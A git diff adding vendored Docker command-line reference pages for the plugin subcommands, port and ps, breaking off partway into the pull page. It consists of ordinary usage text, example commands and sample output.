0000000000..451f1ace9c --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_disable.md @@ -0,0 +1,66 @@ +--- +title: "plugin disable" +description: "the plugin disable command description and usage" +keywords: "plugin, disable" +--- + + + +# plugin disable + +```markdown +Usage: docker plugin disable [OPTIONS] PLUGIN + +Disable a plugin + +Options: + -f, --force Force the disable of an active plugin + --help Print usage +``` + +Disables a plugin. The plugin must be installed before it can be disabled, +see [`docker plugin install`](plugin_install.md). Without the `-f` option, +a plugin that has references (eg, volumes, networks) cannot be disabled. + + +The following example shows that the `sample-volume-plugin` plugin is installed +and enabled: + +```bash +$ docker plugin ls + +ID NAME TAG DESCRIPTION ENABLED +69553ca1d123 tiborvass/sample-volume-plugin latest A test plugin for Docker true +``` + +To disable the plugin, use the following command: + +```bash +$ docker plugin disable tiborvass/sample-volume-plugin + +tiborvass/sample-volume-plugin + +$ docker plugin ls + +ID NAME TAG DESCRIPTION ENABLED +69553ca1d123 tiborvass/sample-volume-plugin latest A test plugin for Docker false +``` + +## Related information + +* [plugin create](plugin_create.md) +* [plugin enable](plugin_enable.md) +* [plugin inspect](plugin_inspect.md) +* [plugin install](plugin_install.md) +* [plugin ls](plugin_ls.md) +* [plugin push](plugin_push.md) +* [plugin rm](plugin_rm.md) +* [plugin set](plugin_set.md) +* [plugin upgrade](plugin_upgrade.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_enable.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_enable.md new file mode 100644 index 0000000000..df8bee3af5 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_enable.md @@ -0,0 +1,65 @@ +--- +title: "plugin enable" +description: "the plugin enable command description and usage" +keywords: "plugin, enable" +--- + + + +# plugin enable + +```markdown +Usage: docker plugin enable [OPTIONS] PLUGIN + +Enable a plugin + +Options: + --help Print usage + --timeout int HTTP client timeout (in seconds) +``` + +Enables a plugin. The plugin must be installed before it can be enabled, +see [`docker plugin install`](plugin_install.md). + + +The following example shows that the `sample-volume-plugin` plugin is installed, +but disabled: + +```bash +$ docker plugin ls + +ID NAME TAG DESCRIPTION ENABLED +69553ca1d123 tiborvass/sample-volume-plugin latest A test plugin for Docker false +``` + +To enable the plugin, use the following command: + +```bash +$ docker plugin enable tiborvass/sample-volume-plugin + +tiborvass/sample-volume-plugin + +$ docker plugin ls + +ID NAME TAG DESCRIPTION ENABLED +69553ca1d123 tiborvass/sample-volume-plugin latest A test plugin for Docker true +``` + +## Related information + +* [plugin create](plugin_create.md) +* [plugin disable](plugin_disable.md) +* [plugin inspect](plugin_inspect.md) +* [plugin install](plugin_install.md) +* [plugin ls](plugin_ls.md) +* [plugin push](plugin_push.md) +* [plugin rm](plugin_rm.md) +* [plugin set](plugin_set.md) +* [plugin upgrade](plugin_upgrade.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_inspect.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_inspect.md new file mode 100644 index 0000000000..fdcc030c43 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_inspect.md @@ -0,0 +1,164 @@ +--- +title: "plugin inspect" +description: "The plugin inspect command description and usage" +keywords: "plugin, inspect" +--- + + + +# plugin inspect + +```markdown +Usage: docker plugin inspect [OPTIONS] PLUGIN [PLUGIN...] + +Display detailed information on one or more plugins + +Options: + -f, --format string Format the output using the given Go template + --help Print usage +``` + +Returns information about a plugin. By default, this command renders all results +in a JSON array. + +Example output: + +```bash +$ docker plugin inspect tiborvass/sample-volume-plugin:latest +``` +```JSON +{ + "Id": "8c74c978c434745c3ade82f1bc0acf38d04990eaf494fa507c16d9f1daa99c21", + "Name": "tiborvass/sample-volume-plugin:latest", + "PluginReference": "tiborvas/sample-volume-plugin:latest", + "Enabled": true, + "Config": { + "Mounts": [ + { + "Name": "", + "Description": "", + "Settable": null, + "Source": "/data", + "Destination": "/data", + "Type": "bind", + "Options": [ + "shared", + "rbind" + ] + }, + { + "Name": "", + "Description": "", + "Settable": null, + "Source": null, + "Destination": "/foobar", + "Type": "tmpfs", + "Options": null + } + ], + "Env": [ + "DEBUG=1" + ], + "Args": null, + "Devices": null + }, + "Manifest": { + "ManifestVersion": "v0", + "Description": "A test plugin for Docker", + "Documentation": "https://docs.docker.com/engine/extend/plugins/", + "Interface": { + "Types": [ + "docker.volumedriver/1.0" + ], + "Socket": "plugins.sock" + }, + "Entrypoint": [ + "plugin-sample-volume-plugin", + "/data" + ], + "Workdir": "", + "User": { + }, + "Network": { + "Type": "host" + }, + "Capabilities": null, + "Mounts": [ + { + "Name": "", + "Description": "", + "Settable": null, + "Source": "/data", + "Destination": "/data", + "Type": "bind", + "Options": [ + "shared", + "rbind" + ] + }, + { + "Name": "", + "Description": "", + "Settable": null, + "Source": null, + "Destination": "/foobar", + "Type": "tmpfs", + "Options": null + } + ], + "Devices": [ + { + "Name": "device", + "Description": "a host device to mount", + "Settable": null, + "Path": "/dev/cpu_dma_latency" + } + ], + "Env": [ + { + "Name": "DEBUG", + "Description": "If set, prints debug messages", + "Settable": null, + "Value": "1" + } + ], + "Args": { + "Name": "args", + "Description": "command line arguments", + "Settable": null, + "Value": [ + + ] + } + } +} +``` +(output formatted for readability) + + +```bash +$ docker plugin inspect -f '{{.Id}}' tiborvass/sample-volume-plugin:latest +``` +``` +8c74c978c434745c3ade82f1bc0acf38d04990eaf494fa507c16d9f1daa99c21 +``` + + +## Related information + +* [plugin create](plugin_create.md) +* [plugin enable](plugin_enable.md) +* [plugin disable](plugin_disable.md) +* [plugin install](plugin_install.md) +* [plugin ls](plugin_ls.md) +* [plugin push](plugin_push.md) +* [plugin rm](plugin_rm.md) +* [plugin set](plugin_set.md) +* [plugin upgrade](plugin_upgrade.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_install.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_install.md new file mode 100644 index 0000000000..0601193ce0 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_install.md @@ -0,0 +1,71 @@ +--- +title: "plugin install" +description: "the plugin install command description and usage" +keywords: "plugin, install" +--- + + + +# plugin install + +```markdown +Usage: docker plugin install [OPTIONS] PLUGIN [KEY=VALUE...] + +Install a plugin + +Options: + --alias string Local name for plugin + --disable Do not enable the plugin on install + --grant-all-permissions Grant all permissions necessary to run the plugin + --help Print usage +``` + +Installs and enables a plugin. Docker looks first for the plugin on your Docker +host. If the plugin does not exist locally, then the plugin is pulled from +the registry. Note that the minimum required registry version to distribute +plugins is 2.3.0 + + +The following example installs `vieus/sshfs` plugin and [set](plugin_set.md) it's env variable +`DEBUG` to 1. Install consists of pulling the plugin from Docker Hub, prompting +the user to accept the list of privileges that the plugin needs, settings parameters + and enabling the plugin. + +```bash +$ docker plugin install vieux/sshfs DEBUG=1 + +Plugin "vieux/sshfs" is requesting the following privileges: + - network: [host] + - device: [/dev/fuse] + - capabilities: [CAP_SYS_ADMIN] +Do you grant the above permissions? [y/N] y +vieux/sshfs +``` + +After the plugin is installed, it appears in the list of plugins: + +```bash +$ docker plugin ls + +ID NAME TAG DESCRIPTION ENABLED +69553ca1d123 vieux/sshfs latest sshFS plugin for Docker true +``` + +## Related information + +* [plugin create](plugin_create.md) +* [plugin disable](plugin_disable.md) +* [plugin enable](plugin_enable.md) +* [plugin inspect](plugin_inspect.md) +* [plugin ls](plugin_ls.md) +* [plugin push](plugin_push.md) +* [plugin rm](plugin_rm.md) +* [plugin set](plugin_set.md) +* [plugin upgrade](plugin_upgrade.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_ls.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_ls.md new file mode 100644 index 0000000000..7a3426d95f --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_ls.md @@ -0,0 +1,53 @@ +--- +title: "plugin ls" +description: "The plugin ls command description and usage" +keywords: "plugin, list" +--- + + + +# plugin ls + +```markdown +Usage: docker plugin ls [OPTIONS] + +List plugins + +Aliases: + ls, list + +Options: + --help Print usage + --no-trunc Don't truncate output +``` + +Lists all the plugins that are currently installed. You can install plugins +using the [`docker plugin install`](plugin_install.md) command. + +Example output: + +```bash +$ docker plugin ls + +ID NAME TAG DESCRIPTION ENABLED +69553ca1d123 tiborvass/sample-volume-plugin latest A test plugin for Docker true +``` + +## Related information + +* [plugin create](plugin_create.md) +* [plugin disable](plugin_disable.md) +* [plugin enable](plugin_enable.md) +* [plugin inspect](plugin_inspect.md) +* [plugin install](plugin_install.md) +* [plugin push](plugin_push.md) +* [plugin rm](plugin_rm.md) +* [plugin set](plugin_set.md) +* [plugin upgrade](plugin_upgrade.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_push.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_push.md new file mode 100644 index 0000000000..e61d10994c --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_push.md @@ -0,0 +1,50 @@ +--- +title: "plugin push" +description: "the plugin push command description and usage" +keywords: "plugin, push" +--- + + + +```markdown +Usage: docker plugin push [OPTIONS] PLUGIN[:TAG] + +Push a plugin to a registry + +Options: + --help Print usage +``` + +Use `docker plugin create` to create the plugin. Once the plugin is ready for distribution, +use `docker plugin push` to share your images to the Docker Hub registry or to a self-hosted one. + +Registry credentials are managed by [docker login](login.md). + +The following example shows how to push a sample `user/plugin`. + +```bash + +$ docker plugin ls +ID NAME TAG DESCRIPTION ENABLED +69553ca1d456 user/plugin latest A sample plugin for Docker false +$ docker plugin push user/plugin +``` + +## Related information + +* [plugin create](plugin_create.md) +* [plugin disable](plugin_disable.md) +* [plugin enable](plugin_enable.md) +* [plugin inspect](plugin_inspect.md) +* [plugin install](plugin_install.md) +* [plugin ls](plugin_ls.md) +* [plugin rm](plugin_rm.md) +* [plugin set](plugin_set.md) +* [plugin upgrade](plugin_upgrade.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_rm.md new file mode 100644 index 0000000000..323ce83f3c --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_rm.md @@ -0,0 +1,56 @@ +--- +title: "plugin rm" +description: "the plugin rm command description and usage" +keywords: "plugin, rm" +--- + + + +# plugin rm + +```markdown +Usage: docker plugin rm [OPTIONS] PLUGIN [PLUGIN...] + +Remove one or more plugins + +Aliases: + rm, remove + +Options: + -f, --force Force the removal of an active plugin + --help Print usage +``` + +Removes a plugin. You cannot remove a plugin if it is enabled, you must disable +a plugin using the [`docker plugin disable`](plugin_disable.md) before removing +it (or use --force, use of force is not recommended, since it can affect +functioning of running containers using the plugin). + +The following example disables and removes the `sample-volume-plugin:latest` plugin; + +```bash +$ docker plugin disable tiborvass/sample-volume-plugin +tiborvass/sample-volume-plugin + +$ docker plugin rm tiborvass/sample-volume-plugin:latest +tiborvass/sample-volume-plugin +``` + +## Related information + +* [plugin create](plugin_create.md) +* [plugin disable](plugin_disable.md) +* [plugin enable](plugin_enable.md) +* [plugin inspect](plugin_inspect.md) +* [plugin install](plugin_install.md) +* [plugin ls](plugin_ls.md) +* [plugin push](plugin_push.md) +* [plugin set](plugin_set.md) +* [plugin upgrade](plugin_upgrade.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_set.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_set.md new file mode 100644 index 0000000000..c206a8a760 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_set.md @@ -0,0 +1,99 @@ +--- +title: "plugin set" +description: "the plugin set command description and usage" +keywords: "plugin, set" +--- + + + +# plugin set + +```markdown +Usage: docker plugin set PLUGIN KEY=VALUE [KEY=VALUE...] + +Change settings for a plugin + +Options: + --help Print usage +``` + +Change settings for a plugin. The plugin must be disabled. + +The settings currently supported are: + * env variables + * source of mounts + * path of devices + * args + +The following example change the env variable `DEBUG` on the +`sample-volume-plugin` plugin. + +```bash +$ docker plugin inspect -f {{.Settings.Env}} tiborvass/sample-volume-plugin +[DEBUG=0] + +$ docker plugin set tiborvass/sample-volume-plugin DEBUG=1 + +$ docker plugin inspect -f {{.Settings.Env}} tiborvass/sample-volume-plugin +[DEBUG=1] +``` + +The following example change the source of the `mymount` mount on +the `myplugin` plugin. + +```bash +$ docker plugin inspect -f '{{with $mount := index .Settings.Mounts 0}}{{$mount.Source}}{{end}}' myplugin +/foo + +$ docker plugins set myplugin mymount.source=/bar + +$ docker plugin inspect -f '{{with $mount := index .Settings.Mounts 0}}{{$mount.Source}}{{end}}' myplugin +/bar +``` + +Note: since only `source` is settable in `mymount`, `docker plugins set mymount=/bar myplugin` would work too. + +The following example change the path of the `mydevice` device on +the `myplugin` plugin. + +```bash +$ docker plugin inspect -f '{{with $device := index .Settings.Devices 0}}{{$device.Path}}{{end}}' myplugin +/dev/foo + +$ docker plugins set myplugin mydevice.path=/dev/bar + +$ docker plugin inspect -f '{{with $device := index .Settings.Devices 0}}{{$device.Path}}{{end}}' myplugin +/dev/bar +``` + +Note: since only `path` is settable in `mydevice`, `docker plugins set mydevice=/dev/bar myplugin` would work too. + +The following example change the source of the args on the `myplugin` plugin. + +```bash +$ docker plugin inspect -f '{{.Settings.Args}}' myplugin +["foo", "bar"] + +$ docker plugins set myplugin args="foo bar baz" + +$ docker plugin inspect -f '{{.Settings.Args}}' myplugin +["foo", "bar", "baz"] +``` + +## Related information + +* [plugin create](plugin_create.md) +* [plugin disable](plugin_disable.md) +* [plugin enable](plugin_enable.md) +* [plugin inspect](plugin_inspect.md) +* [plugin install](plugin_install.md) +* [plugin ls](plugin_ls.md) +* [plugin push](plugin_push.md) +* [plugin rm](plugin_rm.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_upgrade.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_upgrade.md new file mode 100644 index 0000000000..20efc577aa --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_upgrade.md @@ -0,0 +1,84 @@ +--- +title: "plugin upgrade" +description: "the plugin upgrade command description and usage" +keywords: "plugin, upgrade" +--- + + + +# plugin upgrade + +```markdown +Usage: docker plugin upgrade [OPTIONS] PLUGIN [REMOTE] + +Upgrade a plugin + +Options: + --disable-content-trust Skip image verification (default true) + --grant-all-permissions Grant all permissions necessary to run the plugin + --help Print usage + --skip-remote-check Do not check if specified remote plugin matches existing plugin image +``` + +Upgrades an existing plugin to the specified remote plugin image. If no remote +is specified, Docker will re-pull the current image and use the updated version. +All existing references to the plugin will continue to work. +The plugin must be disabled before running the upgrade. + +The following example installs `vieus/sshfs` plugin, uses it to create and use +a volume, then upgrades the plugin. + +```bash +$ docker plugin install vieux/sshfs DEBUG=1 + +Plugin "vieux/sshfs:next" is requesting the following privileges: + - network: [host] + - device: [/dev/fuse] + - capabilities: [CAP_SYS_ADMIN] +Do you grant the above permissions? [y/N] y +vieux/sshfs:next + +$ docker volume create -d vieux/sshfs:next -o sshcmd=root@1.2.3.4:/tmp/shared -o password=XXX sshvolume +sshvolume +$ docker run -it -v sshvolume:/data alpine sh -c "touch /data/hello" +$ docker plugin disable -f vieux/sshfs:next +viex/sshfs:next + +# Here docker volume ls doesn't show 'sshfsvolume', since the plugin is disabled +$ docker volume ls +DRIVER VOLUME NAME + +$ docker plugin upgrade vieux/sshfs:next vieux/sshfs:next +Plugin "vieux/sshfs:next" is requesting the following privileges: + - network: [host] + - device: [/dev/fuse] + - capabilities: [CAP_SYS_ADMIN] +Do you grant the above permissions? [y/N] y +Upgrade plugin vieux/sshfs:next to vieux/sshfs:next +$ docker plugin enable vieux/sshfs:next +viex/sshfs:next +$ docker volume ls +DRIVER VOLUME NAME +viuex/sshfs:next sshvolume +$ docker run -it -v sshvolume:/data alpine sh -c "ls /data" +hello +``` + +## Related information + +* [plugin create](plugin_create.md) +* [plugin disable](plugin_disable.md) +* [plugin enable](plugin_enable.md) +* [plugin inspect](plugin_inspect.md) +* [plugin install](plugin_install.md) +* [plugin ls](plugin_ls.md) +* [plugin push](plugin_push.md) +* [plugin rm](plugin_rm.md) +* [plugin set](plugin_set.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/port.md b/vendor/github.com/docker/docker/docs/reference/commandline/port.md new file mode 100644 index 0000000000..bc90b6e786 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/port.md @@ -0,0 +1,41 @@ +--- +title: "port" +description: "The port command description and usage" +keywords: "port, mapping, container" +--- + + + +# port + +```markdown +Usage: docker port CONTAINER [PRIVATE_PORT[/PROTO]] + +List port mappings or a specific mapping for the container + +Options: + --help Print usage +``` + +You can find out all the ports mapped by not specifying a `PRIVATE_PORT`, or +just a specific mapping: + + $ docker ps + CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES + b650456536c7 busybox:latest top 54 minutes ago Up 54 minutes 0.0.0.0:1234->9876/tcp, 0.0.0.0:4321->7890/tcp test + $ docker port test + 7890/tcp -> 0.0.0.0:4321 + 9876/tcp -> 0.0.0.0:1234 + $ docker port test 7890/tcp + 0.0.0.0:4321 + $ docker port test 7890/udp + 2014/06/24 11:53:36 Error: No public port '7890/udp' published for test + $ docker port test 7890 + 0.0.0.0:4321 diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/ps.md b/vendor/github.com/docker/docker/docs/reference/commandline/ps.md new file mode 100644 index 0000000000..1d5f31da88 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/ps.md @@ -0,0 +1,384 @@ +--- +title: "ps" +description: "The ps command description and usage" +keywords: "container, running, list" +--- + + + +# ps + +```markdown +Usage: docker ps [OPTIONS] + +List containers + +Options: + -a, --all Show all containers (default shows just running) + -f, --filter value Filter output based on conditions provided (default []) + - exited= an exit code of + - label= or label== + - status=(created|restarting|removing|running|paused|exited) + - name= a container's name + - id= a container's ID + - before=(|) + - since=(|) + - ancestor=([:tag]||) + containers created from an image or a descendant. + - is-task=(true|false) + - health=(starting|healthy|unhealthy|none) + --format string Pretty-print containers using a Go template + --help Print usage + -n, --last int Show n last created containers (includes all states) (default -1) + -l, --latest Show the latest created container (includes all states) + --no-trunc Don't truncate output + -q, --quiet Only display numeric IDs + -s, --size Display total file sizes +``` + +Running `docker ps --no-trunc` showing 2 linked containers. + +```bash +$ docker ps + +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +4c01db0b339c ubuntu:12.04 bash 17 seconds ago Up 16 seconds 3300-3310/tcp webapp +d7886598dbe2 crosbymichael/redis:latest /redis-server --dir 33 minutes ago Up 33 minutes 6379/tcp redis,webapp/db +``` + +The `docker ps` command only shows running containers by default. To see all +containers, use the `-a` (or `--all`) flag: + +```bash +$ docker ps -a +``` + +`docker ps` groups exposed ports into a single range if possible. E.g., a +container that exposes TCP ports `100, 101, 102` displays `100-102/tcp` in +the `PORTS` column. + +## Filtering + +The filtering flag (`-f` or `--filter`) format is a `key=value` pair. If there is more +than one filter, then pass multiple flags (e.g. `--filter "foo=bar" --filter "bif=baz"`) + +The currently supported filters are: + +* id (container's id) +* label (`label=` or `label==`) +* name (container's name) +* exited (int - the code of exited containers. Only useful with `--all`) +* status (created|restarting|running|removing|paused|exited|dead) +* ancestor (`[:]`, `` or ``) - filters containers that were created from the given image or a descendant. +* before (container's id or name) - filters containers created before given id or name +* since (container's id or name) - filters containers created since given id or name +* isolation (default|process|hyperv) (Windows daemon only) +* volume (volume name or mount point) - filters containers that mount volumes. +* network (network id or name) - filters containers connected to the provided network +* health (starting|healthy|unhealthy|none) - filters containers based on healthcheck status + +#### Label + +The `label` filter matches containers based on the presence of a `label` alone or a `label` and a +value. + +The following filter matches containers with the `color` label regardless of its value. + +```bash +$ docker ps --filter "label=color" + +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +673394ef1d4c busybox "top" 47 seconds ago Up 45 seconds nostalgic_shockley +d85756f57265 busybox "top" 52 seconds ago Up 51 seconds high_albattani +``` + +The following filter matches containers with the `color` label with the `blue` value. + +```bash +$ docker ps --filter "label=color=blue" + +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +d85756f57265 busybox "top" About a minute ago Up About a minute high_albattani +``` + +#### Name + +The `name` filter matches on all or part of a container's name. + +The following filter matches all containers with a name containing the `nostalgic_stallman` string. + +```bash +$ docker ps --filter "name=nostalgic_stallman" + +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +9b6247364a03 busybox "top" 2 minutes ago Up 2 minutes nostalgic_stallman +``` + +You can also filter for a substring in a name as this shows: + +```bash +$ docker ps --filter "name=nostalgic" + +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +715ebfcee040 busybox "top" 3 seconds ago Up 1 second i_am_nostalgic +9b6247364a03 busybox "top" 7 minutes ago Up 7 minutes nostalgic_stallman +673394ef1d4c busybox "top" 38 minutes ago Up 38 minutes nostalgic_shockley +``` + +#### Exited + +The `exited` filter matches containers by exist status code. For example, to +filter for containers that have exited successfully: + +```bash +$ docker ps -a --filter 'exited=0' + +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +ea09c3c82f6e registry:latest /srv/run.sh 2 weeks ago Exited (0) 2 weeks ago 127.0.0.1:5000->5000/tcp desperate_leakey +106ea823fe4e fedora:latest /bin/sh -c 'bash -l' 2 weeks ago Exited (0) 2 weeks ago determined_albattani +48ee228c9464 fedora:20 bash 2 weeks ago Exited (0) 2 weeks ago tender_torvalds +``` + +#### Killed containers + +You can use a filter to locate containers that exited with status of `137` +meaning a `SIGKILL(9)` killed them. + +```bash +$ docker ps -a --filter 'exited=137' +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +b3e1c0ed5bfe ubuntu:latest "sleep 1000" 12 seconds ago Exited (137) 5 seconds ago grave_kowalevski +a2eb5558d669 redis:latest "/entrypoint.sh redi 2 hours ago Exited (137) 2 hours ago sharp_lalande +``` + +Any of these events result in a `137` status: + +* the `init` process of the container is killed manually +* `docker kill` kills the container +* Docker daemon restarts which kills all running containers + +#### Status + +The `status` filter matches containers by status. You can filter using +`created`, `restarting`, `running`, `removing`, `paused`, `exited` and `dead`. For example, +to filter for `running` containers: + +```bash +$ docker ps --filter status=running + +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +715ebfcee040 busybox "top" 16 minutes ago Up 16 minutes i_am_nostalgic +d5c976d3c462 busybox "top" 23 minutes ago Up 23 minutes top +9b6247364a03 busybox "top" 24 minutes ago Up 24 minutes nostalgic_stallman +``` + +To filter for `paused` containers: + +```bash +$ docker ps --filter status=paused + +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +673394ef1d4c busybox "top" About an hour ago Up About an hour (Paused) nostalgic_shockley +``` + +#### Ancestor + +The `ancestor` filter matches containers based on its image or a descendant of +it. The filter supports the following image representation: + +- image +- image:tag +- image:tag@digest +- short-id +- full-id + +If you don't specify a `tag`, the `latest` tag is used. For example, to filter +for containers that use the latest `ubuntu` image: + +```bash +$ docker ps --filter ancestor=ubuntu + +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +919e1179bdb8 ubuntu-c1 "top" About a minute ago Up About a minute admiring_lovelace +5d1e4a540723 ubuntu-c2 "top" About a minute ago Up About a minute admiring_sammet +82a598284012 ubuntu "top" 3 minutes ago Up 3 minutes sleepy_bose +bab2a34ba363 ubuntu "top" 3 minutes ago Up 3 minutes focused_yonath +``` + +Match containers based on the `ubuntu-c1` image which, in this case, is a child +of `ubuntu`: + +```bash +$ docker ps --filter ancestor=ubuntu-c1 + +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +919e1179bdb8 ubuntu-c1 "top" About a minute ago Up About a minute admiring_lovelace +``` + +Match containers based on the `ubuntu` version `12.04.5` image: + +```bash +$ docker ps --filter ancestor=ubuntu:12.04.5 + +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +82a598284012 ubuntu:12.04.5 "top" 3 minutes ago Up 3 minutes sleepy_bose +``` + +The following matches containers based on the layer `d0e008c6cf02` or an image +that have this layer in its layer stack. + +```bash +$ docker ps --filter ancestor=d0e008c6cf02 + +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +82a598284012 ubuntu:12.04.5 "top" 3 minutes ago Up 3 minutes sleepy_bose +``` + +#### Before + +The `before` filter shows only containers created before the container with +given id or name. For example, having these containers created: + +```bash +$ docker ps + +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +9c3527ed70ce busybox "top" 14 seconds ago Up 15 seconds desperate_dubinsky +4aace5031105 busybox "top" 48 seconds ago Up 49 seconds focused_hamilton +6e63f6ff38b0 busybox "top" About a minute ago Up About a minute distracted_fermat +``` + +Filtering with `before` would give: + +```bash +$ docker ps -f before=9c3527ed70ce + +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +4aace5031105 busybox "top" About a minute ago Up About a minute focused_hamilton +6e63f6ff38b0 busybox "top" About a minute ago Up About a minute distracted_fermat +``` + +#### Since + +The `since` filter shows only containers created since the container with given +id or name. For example, with the same containers as in `before` filter: + +```bash +$ docker ps -f since=6e63f6ff38b0 + +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +9c3527ed70ce busybox "top" 10 minutes ago Up 10 minutes desperate_dubinsky +4aace5031105 busybox "top" 10 minutes ago Up 10 minutes focused_hamilton +``` + +#### Volume + +The `volume` filter shows only containers that mount a specific volume or have +a volume mounted in a specific path: + +```bash{% raw %} +$ docker ps --filter volume=remote-volume --format "table {{.ID}}\t{{.Mounts}}" +CONTAINER ID MOUNTS +9c3527ed70ce remote-volume + +$ docker ps --filter volume=/data --format "table {{.ID}}\t{{.Mounts}}" +CONTAINER ID MOUNTS +9c3527ed70ce remote-volume +{% endraw %}``` + +#### Network + +The `network` filter shows only containers that are connected to a network with +a given name or id. + +The following filter matches all containers that are connected to a network +with a name containing `net1`. + +```bash +$ docker run -d --net=net1 --name=test1 ubuntu top +$ docker run -d --net=net2 --name=test2 ubuntu top + +$ docker ps --filter network=net1 + +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +9d4893ed80fe ubuntu "top" 10 minutes ago Up 10 minutes test1 +``` + +The network filter matches on both the network's name and id. The following +example shows all containers that are attached to the `net1` network, using +the network id as a filter; + +```bash +{% raw %} +$ docker network inspect --format "{{.ID}}" net1 +{% endraw %} + +8c0b4110ae930dbe26b258de9bc34a03f98056ed6f27f991d32919bfe401d7c5 + +$ docker ps --filter network=8c0b4110ae930dbe26b258de9bc34a03f98056ed6f27f991d32919bfe401d7c5 + +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +9d4893ed80fe ubuntu "top" 10 minutes ago Up 10 minutes test1 +``` + +## Formatting + +The formatting option (`--format`) pretty-prints container output using a Go +template. + +Valid placeholders for the Go template are listed below: + +Placeholder | Description +--------------|---------------------------------------------------------------------------------------------------- +`.ID` | Container ID +`.Image` | Image ID +`.Command` | Quoted command +`.CreatedAt` | Time when the container was created. +`.RunningFor` | Elapsed time since the container was started. +`.Ports` | Exposed ports. +`.Status` | Container status. +`.Size` | Container disk size. +`.Names` | Container names. +`.Labels` | All labels assigned to the container. +`.Label` | Value of a specific label for this container. For example `'{% raw %}{{.Label "com.docker.swarm.cpu"}}{% endraw %}'` +`.Mounts` | Names of the volumes mounted in this container. +`.Networks` | Names of the networks attached to this container. + +When using the `--format` option, the `ps` command will either output the data +exactly as the template declares or, when using the `table` directive, includes +column headers as well. + +The following example uses a template without headers and outputs the `ID` and +`Command` entries separated by a colon for all running containers: + +```bash +{% raw %} +$ docker ps --format "{{.ID}}: {{.Command}}" +{% endraw %} + +a87ecb4f327c: /bin/sh -c #(nop) MA +01946d9d34d8: /bin/sh -c #(nop) MA +c1d3b0166030: /bin/sh -c yum -y up +41d50ecd2f57: /bin/sh -c #(nop) MA +``` + +To list all running containers with their labels in a table format you can use: + +```bash +{% raw %} +$ docker ps --format "table {{.ID}}\t{{.Labels}}" +{% endraw %} + +CONTAINER ID LABELS +a87ecb4f327c com.docker.swarm.node=ubuntu,com.docker.swarm.storage=ssd +01946d9d34d8 +c1d3b0166030 com.docker.swarm.node=debian,com.docker.swarm.cpu=6 +41d50ecd2f57 com.docker.swarm.node=fedora,com.docker.swarm.cpu=3,com.docker.swarm.storage=ssd +``` diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/pull.md b/vendor/github.com/docker/docker/docs/reference/commandline/pull.md new file mode 100644 index 0000000000..0c960b404a --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/pull.md @@ -0,0 +1,252 @@ +--- +title: "pull" +description: "The pull command description and usage" +keywords: "pull, image, hub, docker" +--- + + + +# pull + +```markdown +Usage: docker pull [OPTIONS] NAME[:TAG|@DIGEST] + +Pull an image or a repository from a registry + +Options: + -a, --all-tags Download all tagged images in the repository + --disable-content-trust Skip image verification (default true) + --help Print usage +``` + +Most of your images will be created on top of a base image from the +[Docker Hub](https://hub.docker.com) registry. + +[Docker Hub](https://hub.docker.com) contains many pre-built images that you +can `pull` and try without needing to define and configure your own. + +To download a particular image, or set of images (i.e., a repository), +use `docker pull`. + +## Proxy configuration + +If you are behind an HTTP proxy server, for example in corporate settings, +before open a connect to registry, you may need to configure the Docker +daemon's proxy settings, using the `HTTP_PROXY`, `HTTPS_PROXY`, and `NO_PROXY` +environment variables. To set these environment variables on a host using +`systemd`, refer to the [control and configure Docker with systemd](https://docs.docker.com/engine/admin/systemd/#http-proxy) +for variables configuration. + +## Concurrent downloads + +By default the Docker daemon will pull three layers of an image at a time. +If you are on a low 